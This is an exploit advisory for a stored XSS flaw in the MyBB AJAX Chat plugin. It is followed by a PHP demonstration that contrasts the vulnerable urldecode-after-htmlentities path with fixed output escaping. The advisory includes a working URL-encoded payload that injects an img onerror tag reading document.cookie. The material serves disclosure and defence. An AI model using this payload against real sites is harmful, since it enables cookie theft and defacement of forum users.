MyBB AJAX Chat Persistent XSS Vulnerability


A persistent XSS vulnerability has been found in MyBB AJAX Chat. The discoverer's notes on how the vulnerability arises and how it is exploited are as follows.


# Title: MyBB AJAX Chat Persistent XSS Vulnerability

# Date: 12/12/2012

# Exploit Author: Mr. P-teo

# Vendor Homepage: http://www.mybb.com/

# Software Link: http://mods.mybb.com/view/ajax-chat

# Version: 1

# Tested on: Windows

The Persistent XSS vulnerability lies within the chat_frame.php page.

*************************************** Persistent / Stored XSS **************************************

Although the message is filtered with the htmlentities function below:

<?php $db->insert_query($tbl, array('uid' => $mybb->user['uid'], 'message' => $db->escape_string(htmlentities($message)), 'date' => time())); ?>

The vulnerability occurs with the use of the urldecode function, allowing us to bypass htmlentities with URL encoding.

<?php $msg = urldecode($row["message"]); ?>

The vulnerability can be exploited via the following line, which decodes to "><img src="XSS" onerror="alert(document.cookie)" />

%22%3E%3Cimg%20src%3D%22XSS%22%20onerror%3D%22alert(document.cookie)%22%20%2F%3E%0A

This can be expanded on with defaces etc.; alert is just a basic example.

Brought to you by Mr. P-teo.

Twitter: http://twitter.com/MrPteo
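To make the ordering bug concrete, here is an added example that is not part of the advisory above and not the plugin's own code. It models the two code paths the advisory quotes (htmlentities() on the insert side, urldecode() on the render side) with a plain PHP array standing in for the database row; the function names (store_message_vulnerable, render_message_vulnerable, render_message_fixed, render_message_no_decode, has_raw_markup) are this example's own. It runs the advisory's URL-encoded payload and an unencoded attempt through the vulnerable path and through two hardened render paths.

```php
<?php
// Added example, not the AJAX Chat plugin's code: models the advisory's insert and
// render paths with a fake row array to show why urldecode() after htmlentities()
// reintroduces markup, and contrasts it with escaping at the point of output.

// Insert path, as quoted in the advisory: the message is entity-encoded before storage.
// $db->escape_string() is omitted; it only protects the SQL statement and has no
// bearing on the HTML context.
function store_message_vulnerable(string $message): array
{
    return ['message' => htmlentities($message, ENT_QUOTES, 'UTF-8')];
}

// Render path, as in chat_frame.php: the stored value is URL-decoded and then
// emitted into the page unchanged.
function render_message_vulnerable(array $row): string
{
    return urldecode($row['message']);
}

// Hardened render path: whatever decoding happens, HTML-escaping is the LAST step
// before output. Decoding after escaping is exactly what opened the hole.
function render_message_fixed(array $row): string
{
    return htmlspecialchars(urldecode($row['message']), ENT_QUOTES, 'UTF-8');
}

// Alternative fix when nothing upstream intentionally URL-encodes messages:
// do not urldecode() data that was stored entity-encoded.
function render_message_no_decode(array $row): string
{
    return $row['message'];
}

// Crude check: does the rendered string contain raw tag delimiters?
function has_raw_markup(string $rendered): bool
{
    return strpbrk($rendered, '<>') !== false;
}

// Payload from the advisory. Every byte in it is one htmlentities() leaves alone
// (percent signs, letters, digits, parentheses, a dot), so it is stored verbatim
// and urldecode() rebuilds the <img> tag at output time.
$payload = '%22%3E%3Cimg%20src%3D%22XSS%22%20onerror%3D%22alert(document.cookie)%22%20%2F%3E';
// The same markup without URL encoding, for comparison: htmlentities() neutralises it.
$plain = '"><img src="XSS" onerror="alert(document.cookie)" />';

foreach (['encoded' => $payload, 'plain' => $plain] as $label => $input) {
    $row = store_message_vulnerable($input);
    printf("%-8s stored:     %s\n", $label, $row['message']);
    foreach (['vulnerable' => 'render_message_vulnerable',
              'fixed'      => 'render_message_fixed',
              'no-decode'  => 'render_message_no_decode'] as $name => $fn) {
        $out = $fn($row);
        printf("%-8s %-11s %s  [%s]\n", $label, $name . ':', $out,
            has_raw_markup($out) ? 'MARKUP LEAKS' : 'inert');
    }
    echo "\n";
}
```

Running it shows the encoded payload passing through storage untouched and emerging from render_message_vulnerable() as live markup, while the plain attempt is inert on every path. Note that render_message_fixed() double-encodes the already-entity-encoded plain message (`&amp;quot;`), which is the cost of layering a second encoding on top of the first; the cleaner design is to store the raw message (escape_string() for the SQL layer only) and call htmlspecialchars() exactly once, at output.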
